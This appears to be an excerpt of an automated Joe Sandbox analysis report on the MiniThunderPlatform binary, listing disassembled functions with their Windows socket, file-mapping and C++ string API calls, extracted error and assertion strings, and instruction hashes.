                                                                                                                                                • Part of subcall function 10028CA0: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?), ref: 10028CE6
                                                                                                                                                • Part of subcall function 10028CA0: ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP71(?,?), ref: 10028CFF
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000), ref: 100B25CF
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B25E1
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?), ref: 100B262E
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100B2640
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(?,00000014), ref: 100B265D
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP71(?,00000014), ref: 100B267A
                                                                                                                                              • GetTickCount.KERNEL32 ref: 100B2697
                                                                                                                                                • Part of subcall function 10027700: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,?,?,?,100291DB,00000000), ref: 1002771C
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027729
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027736
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027743
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027750
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 1002775F
                                                                                                                                                • Part of subcall function 10023953: __EH_prolog.LIBCMT ref: 10023958
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10023971
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002397E
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1002398B
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10023998
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100239A5
                                                                                                                                                • Part of subcall function 10023953: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100239B1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$V12@$??1?$basic_string@?assign@?$basic_string@$V12@@$??0?$basic_string@$??$?8D@1@@std@@D@2@@0@0@V?$basic_string@$H_prolog$?erase@?$basic_string@CountTickmalloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 11785127-0
                                                                                                                                              • Opcode ID: 8d3e04fe36587c4058921bb59956b6523b6b58e84e411f8080a2238fa27b8b05
                                                                                                                                              • Instruction ID: 77d7ac40d7ed6bddd494c4f64e911cbd7309919fef919df3b4a059535bef345c
                                                                                                                                              • Opcode Fuzzy Hash: 8d3e04fe36587c4058921bb59956b6523b6b58e84e411f8080a2238fa27b8b05
                                                                                                                                              • Instruction Fuzzy Hash: 2BE126755087819FD365DF24C898BDBBBE8FF98304F408A5DE49E83291DB30A648CB52
                                                                                                                                              Function 100C8450 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 96COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetTickCount.KERNEL32 ref: 100C846E
                                                                                                                                              • ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H@Z.MSVCP71(00000003,00000001), ref: 100C84BE
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100C850D
                                                                                                                                              • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP71 ref: 100C8514
                                                                                                                                              • ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP71(00000000), ref: 100C851B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C852C
                                                                                                                                              • ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2@XZ.MSVCP71(?), ref: 100C853B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C8585
                                                                                                                                              • ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXXZ.MSVCP71 ref: 100C859A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@$D@std@@V?$allocator@$D@2@@std@@$D@std@@@std@@$??$?6??1?$basic_string@D@std@@@0@V10@V?$basic_ostream@$??0?$basic_stringstream@??6?$basic_ostream@?str@?$basic_stringstream@CountD?$basic_stringstream@D@2@@2@TickV01@V?$basic_string@
                                                                                                                                              • String ID: do_connect error$ no:
                                                                                                                                              • API String ID: 564511375-1570947973
                                                                                                                                              • Opcode ID: 52512c8700c68407e96950eb092d139caa4e713b565e491d48ecdcb8882d600d
                                                                                                                                              • Instruction ID: 9655eb201cb78beb98068f7c408035a3a2be131c17463bfe10d392761212c88f
                                                                                                                                              • Opcode Fuzzy Hash: 52512c8700c68407e96950eb092d139caa4e713b565e491d48ecdcb8882d600d
                                                                                                                                              • Instruction Fuzzy Hash: BC4167752043809FD364DB24CC98F9BBBE8FB99710F008A5DF49A83291DB74A548CB62
                                                                                                                                              Function 10051320 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81networkCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • socket.WS2_32(00000002,00000002,00000000), ref: 1005134E
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 1005135C
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B9B68), ref: 10051397
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(create socket object error), ref: 1005136D
                                                                                                                                                • Part of subcall function 1021ADF0: ??0exception@@QAE@XZ.MSVCR71(?,00000000), ref: 1021AE10
                                                                                                                                                • Part of subcall function 1021ADF0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1021AE35
                                                                                                                                                • Part of subcall function 1021ADF0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(, error code: ,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1021AE47
                                                                                                                                                • Part of subcall function 1021ADF0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1021AE66
                                                                                                                                                • Part of subcall function 1021ADF0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1021AE75
                                                                                                                                              • WSAIoctl.WS2_32(?,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 100513D0
                                                                                                                                              • setsockopt.WS2_32(000000FF,0000FFFF,00000020,?,00000001), ref: 100513ED
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 100513F8
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(setsockopt error), ref: 10051409
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B9B68), ref: 10051433
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$ErrorExceptionLastThrow$??0exception@@??1?$basic_string@?append@?$basic_string@IoctlV01@V01@@V12@V12@@Y?$basic_string@setsockoptsocket
                                                                                                                                              • String ID: create socket object error$setsockopt error
                                                                                                                                              • API String ID: 2731679550-3766369964
                                                                                                                                              • Opcode ID: f26c13ef510b77c063b38a6a17bdd2b0e1adaa04e4cc276f45583294638e64e2
                                                                                                                                              • Instruction ID: 559b7226851620ae625c7e41a9265a0b6a6f165be21cf5ae3dbdcb24e27fc5e9
                                                                                                                                              • Opcode Fuzzy Hash: f26c13ef510b77c063b38a6a17bdd2b0e1adaa04e4cc276f45583294638e64e2
                                                                                                                                              • Instruction Fuzzy Hash: 2B316875144741AFD320DB60CC49F9BB7E8EB89710F504B1CF6A6962D0DBB4A588CB62
                                                                                                                                              Function 10048810 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 143networkCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • WSARecv.WS2_32(?,?,00000001,?,?,?,Function_00035BD0), ref: 10048929
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 10048934
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(asyn read request error), ref: 10048970
                                                                                                                                                • Part of subcall function 1021ADF0: ??0exception@@QAE@XZ.MSVCR71(?,00000000), ref: 1021AE10
                                                                                                                                                • Part of subcall function 1021ADF0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1021AE35
                                                                                                                                                • Part of subcall function 1021ADF0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP71(, error code: ,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1021AE47
                                                                                                                                                • Part of subcall function 1021ADF0: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71 ref: 1021AE66
                                                                                                                                                • Part of subcall function 1021ADF0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1021AE75
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B9B68,?,00000000), ref: 10048993
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@$V01@@$??0exception@@?append@?$basic_string@ErrorExceptionH_prologLastRecvThrowV01@V12@V12@@Y?$basic_string@
                                                                                                                                              • String ID: .\asyn_socket_device_imp.cpp$asyn read request error$buffer_pos+expected_bytes <= operation_ptr->buffer_len()$expected_bytes != 0$operation_ptr->is_pending() == false$thunder_assert
                                                                                                                                              • API String ID: 13881806-2724939351
                                                                                                                                              • Opcode ID: 7ef705b6161c5188384e82cebf4392e19fc382826afcca971ba5ab518a283ed9
                                                                                                                                              • Instruction ID: 65d43b036a61228c3e0791f6634e7851dfa5d98b26cc0f952be066ab8f619dbf
                                                                                                                                              • Opcode Fuzzy Hash: 7ef705b6161c5188384e82cebf4392e19fc382826afcca971ba5ab518a283ed9
                                                                                                                                              • Instruction Fuzzy Hash: CD51E175104B00AFC310DF64C880E6BB7E5FB98214F548A2DF6A987682E731F955CF92
                                                                                                                                              Function 00432440 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 127fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 0043247C
                                                                                                                                              • ??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z.MSVCP71(_tp_sm_1266909420), ref: 004324A6
                                                                                                                                              • ??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W@Z.MSVCP71(00449980), ref: 004324C9
                                                                                                                                              • ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QBEPB_WXZ.MSVCP71 ref: 004324DB
                                                                                                                                              • CreateFileMappingW.KERNELBASE(00000000,00000000,00000004,00000000,00100000,00000000), ref: 004324F8
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71 ref: 00432528
                                                                                                                                              • MapViewOfFile.KERNEL32(?,00000002,00000000,00000000,00000000), ref: 0043255B
                                                                                                                                              • CloseHandle.KERNEL32(?,?,00000002,00000000,00000000,00000000), ref: 00432579
                                                                                                                                              • ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ.MSVCP71(?,00000002,00000000,00000000,00000000), ref: 004325A4
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1614044465.0000000000417000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1614008254.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614044465.0000000000456000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614158449.000000000045A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1614181616.000000000045C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: U?$char_traits@_V?$allocator@_W@2@@std@@W@std@@$??1?$basic_string@_FileV01@Y?$basic_string@_$??0?$basic_string@_?data@?$basic_string@_CloseCreateHandleMappingV01@@View
                                                                                                                                              • String ID: _tp_sm_1266909420
                                                                                                                                              • API String ID: 243475080-2335214447
                                                                                                                                              • Opcode ID: a0fca0e788167b0341238bdc6e66679d4f3d8c6a2060f8ec2d5ad2e7ee007efb
                                                                                                                                              • Instruction ID: c2033785d92f39de1a6dfe5c69450b8ac8deb055c5409ea91e0a689f765f836f
                                                                                                                                              • Opcode Fuzzy Hash: a0fca0e788167b0341238bdc6e66679d4f3d8c6a2060f8ec2d5ad2e7ee007efb
                                                                                                                                              • Instruction Fuzzy Hash: E841D872D00608EFDB60EF68DC82BDC7770EB08314F51425AF915AB290CB79AD84CB99
                                                                                                                                              Function 1001AF3B Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 111COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __EH_prolog.LIBCMT ref: 1001AF40
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001AFAF
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001AFF8
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001B048
                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 1001B05C
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1001B081
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$H_prolog$FreeLibraryV01@@
                                                                                                                                              • String ID: .\DownloadLib.cpp$_asyn_frame$_asyn_frame->IsInAsynFrameThread() == S_OK$thunder_assert
                                                                                                                                              • API String ID: 3437135587-210221719
                                                                                                                                              • Opcode ID: 40ab9a568dd560af5c320348baaa8d80db5aeba2dfeced407b4ac729ffc541b8
                                                                                                                                              • Instruction ID: 27d2f071a1dbde6995dd5c02628617881719cf2f7eea1d106bc42b9ab57c5181
                                                                                                                                              • Opcode Fuzzy Hash: 40ab9a568dd560af5c320348baaa8d80db5aeba2dfeced407b4ac729ffc541b8
                                                                                                                                              • Instruction Fuzzy Hash: 4A415C35900118EFCB05DFE4CD89AEEBBB5FF19305F508199E006AB152DB70AA95CB61
                                                                                                                                              Function 100489D0 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 107networkCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • WSASend.WS2_32(?,?,00000001,?,00000000,?,Function_00035BD0), ref: 10048AD2
                                                                                                                                              • WSAGetLastError.WS2_32 ref: 10048ADD
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(asyn write request error), ref: 10048AFD
                                                                                                                                              • _CxxThrowException.MSVCR71(?,102B9B68,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 10048B24
                                                                                                                                                • Part of subcall function 100261B0: __EH_prolog.LIBCMT ref: 100261B5
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(?,?,?), ref: 100261DE
                                                                                                                                                • Part of subcall function 100261B0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(00000000,?,?), ref: 1002620C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 10026226
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 1002623C
                                                                                                                                                • Part of subcall function 100261B0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?), ref: 1002625A
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@??1?$basic_string@$ErrorExceptionH_prologLastSendThrowV01@@
                                                                                                                                              • String ID: .\asyn_socket_device_imp.cpp$asyn write request error$buffer_pos+expected_bytes <= operation_ptr->buffer_len()$expected_bytes != 0$operation_ptr->is_pending() == false$thunder_assert
                                                                                                                                              • API String ID: 3461854569-3475813155
                                                                                                                                              • Opcode ID: 3dbc0bb995de0656480ce5994af82dfa82f34f7954392577c68ce85423481b1c
                                                                                                                                              • Instruction ID: 1a6c8ad856d925c6fc41f753efb66b1977f369286e06581f144acf9ac620270d
                                                                                                                                              • Opcode Fuzzy Hash: 3dbc0bb995de0656480ce5994af82dfa82f34f7954392577c68ce85423481b1c
                                                                                                                                              • Instruction Fuzzy Hash: F641BA72604740AFD310DF28CC40F9BBBE4FBA9208F148A1EF199D3682E771B5158B92
                                                                                                                                              Function 1006EAE0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 66COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 1006EB2B
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 1006EB45
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(temp_file), ref: 1006EB5C
                                                                                                                                                • Part of subcall function 1006D7FE: __EH_prolog.LIBCMT ref: 1006D803
                                                                                                                                                • Part of subcall function 1006D7FE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006D833
                                                                                                                                                • Part of subcall function 1006D7FE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1006D8A1
                                                                                                                                                • Part of subcall function 1006D7FE: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006D8B5
